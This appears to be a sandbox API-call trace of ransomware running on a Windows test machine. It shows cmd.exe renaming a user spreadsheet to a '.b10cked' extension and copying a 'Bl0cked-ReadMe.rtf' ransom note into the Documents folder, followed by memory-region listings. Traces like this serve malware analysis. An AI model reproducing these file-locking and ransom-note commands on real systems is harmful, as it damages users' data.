[0129.385] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0129.385] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0129.385] _wcsicmp (_String1="7JMXGW~1.XLS", _String2=".") returned 9 [0129.385] _wcsicmp (_String1="7JMXGW~1.XLS", _String2="..") returned 9 [0129.385] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgw~1.xls")) returned 0x20 [0129.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.386] SetErrorMode (uMode=0x0) returned 0x0 [0129.386] SetErrorMode (uMode=0x1) returned 0x0 [0129.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", nBufferLength=0x104, lpBuffer=0x26ea24, lpFilePart=0x26ea0c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", lpFilePart=0x26ea0c*="7JMXGW~1.XLS") returned 0x26 [0129.386] SetErrorMode (uMode=0x0) returned 0x1 [0129.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x11 [0129.386] _wcsicmp (_String1="7JMXGW~1.XLS", _String2=".") returned 9 [0129.386] _wcsicmp (_String1="7JMXGW~1.XLS", _String2="..") returned 9 [0129.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgw~1.xls")) returned 0x20 [0129.386] SetErrorMode (uMode=0x0) returned 0x0 [0129.386] SetErrorMode (uMode=0x1) returned 0x0 [0129.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", nBufferLength=0x104, lpBuffer=0x26eea0, lpFilePart=0x26ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", lpFilePart=0x26ec38*="7JMXGW~1.XLS") returned 0x26 [0129.386] SetErrorMode (uMode=0x0) returned 0x1 [0129.386] SetErrorMode (uMode=0x0) returned 0x0 [0129.386] SetErrorMode (uMode=0x1) returned 0x0 [0129.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26f0a8, lpFilePart=0x26ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", lpFilePart=0x26ec38*="7jmxgwY9.xlsx.b10cked") returned 0x2f [0129.386] SetErrorMode (uMode=0x0) returned 0x1 [0129.386] SetLastError (dwErrCode=0x0) [0129.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx.b10cked")) returned 0xffffffff [0129.387] GetLastError () returned 0x2 [0129.387] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26e5b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e5b4) returned 0x2a0ee8 [0129.387] FindNextFileW (in: hFindFile=0x2a0ee8, lpFindFileData=0x26e5b4 | out: lpFindFileData=0x26e5b4) returned 0 [0129.387] GetLastError () returned 0x12 [0129.387] FindClose (in: hFindFile=0x2a0ee8 | out: hFindFile=0x2a0ee8) returned 1 [0129.388] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2b1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ae0) returned 0x2a0ee8 [0129.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked", lpFilePart=0x0) returned 0x2f [0129.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx", nBufferLength=0x104, lpBuffer=0x26e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx", lpFilePart=0x0) returned 0x27 [0129.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx")) returned 0x20 [0129.388] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\7jmxgwy9.xlsx.b10cked"), dwFlags=0x3) returned 1 [0129.389] FindClose (in: hFindFile=0x2a0ee8 | out: hFindFile=0x2a0ee8) returned 1 [0129.389] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26e800 | out: _Buffer=" 1") returned 9 [0129.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.389] GetFileType (hFile=0x7) returned 0x2 [0129.548] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0129.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26e78c | out: lpMode=0x26e78c) returned 1 [0129.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.548] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26e7c0 | out: lpConsoleScreenBufferInfo=0x26e7c0) returned 1 [0129.548] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0129.548] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26e800 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0129.549] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26e7e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26e7e4*=0x1a) returned 1 [0129.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.549] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.549] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.549] SetConsoleInputExeNameW () returned 0x1 [0129.549] GetConsoleOutputCP () returned 0x1b5 [0129.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.550] exit (_Code=0) Process: id = "93" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0x938" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11131 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11132 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11133 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11134 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 11135 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11136 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11137 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11138 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11139 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 11140 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11175 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11176 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11177 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11178 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 11179 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 11180 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11181 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11182 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11183 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11184 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11185 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11186 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11187 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11188 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11189 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11190 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11191 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11192 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 11193 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 11194 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11195 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 11196 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 11197 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 11198 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Thread: id = 150 os_tid = 0x8b8 [0129.408] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf864 | out: lpSystemTimeAsFileTime=0x2cf864*(dwLowDateTime=0x871063e0, dwHighDateTime=0x1d440a9)) [0129.408] GetCurrentProcessId () returned 0x938 [0129.408] GetCurrentThreadId () returned 0x8b8 [0129.408] GetTickCount () returned 0x29665 [0129.408] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf85c | out: lpPerformanceCount=0x2cf85c*=18619682569) returned 1 [0129.408] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0129.408] __set_app_type (_Type=0x1) [0129.408] __p__fmode () returned 0x76b331f4 [0129.408] __p__commode () returned 0x76b331fc [0129.408] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0129.408] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0129.409] GetCurrentThreadId () returned 0x8b8 [0129.409] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8b8) returned 0x38 [0129.409] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.409] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0129.409] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.409] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.409] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf7f4 | out: phkResult=0x2cf7f4*=0x0) returned 0x2 [0129.409] VirtualQuery (in: lpAddress=0x2cf82b, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.409] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf7c4, dwLength=0x1c | out: lpBuffer=0x2cf7c4*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0129.409] GetConsoleOutputCP () returned 0x1b5 [0129.409] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.410] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0129.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.410] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0129.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.410] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.410] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.410] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.410] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.410] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0129.411] GetEnvironmentStringsW () returned 0x390168* [0129.411] FreeEnvironmentStringsW (penv=0x390168) returned 1 [0129.411] GetEnvironmentStringsW () returned 0x390168* [0129.411] FreeEnvironmentStringsW (penv=0x390168) returned 1 [0129.411] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce764 | out: phkResult=0x2ce764*=0x40) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x90, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x0, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.411] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegCloseKey (hKey=0x40) returned 0x0 [0129.412] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce764 | out: phkResult=0x2ce764*=0x40) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x40, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x1, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x0, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x9, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x4, lpData=0x2ce770*=0x9, lpcbData=0x2ce768*=0x4) returned 0x0 [0129.412] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce76c, lpData=0x2ce770, lpcbData=0x2ce768*=0x1000 | out: lpType=0x2ce76c*=0x0, lpData=0x2ce770*=0x9, lpcbData=0x2ce768*=0x1000) returned 0x2 [0129.412] RegCloseKey (hKey=0x40) returned 0x0 [0129.412] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886364 [0129.412] srand (_Seed=0x5b886364) [0129.412] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0129.412] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0129.412] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.413] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3918c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0129.413] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.413] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.413] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.413] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.413] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.413] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.413] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.413] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.413] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.413] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.413] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.413] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.413] GetEnvironmentStringsW () returned 0x3922b8* [0129.413] FreeEnvironmentStringsW (penv=0x3922b8) returned 1 [0129.413] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.414] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.414] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.414] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 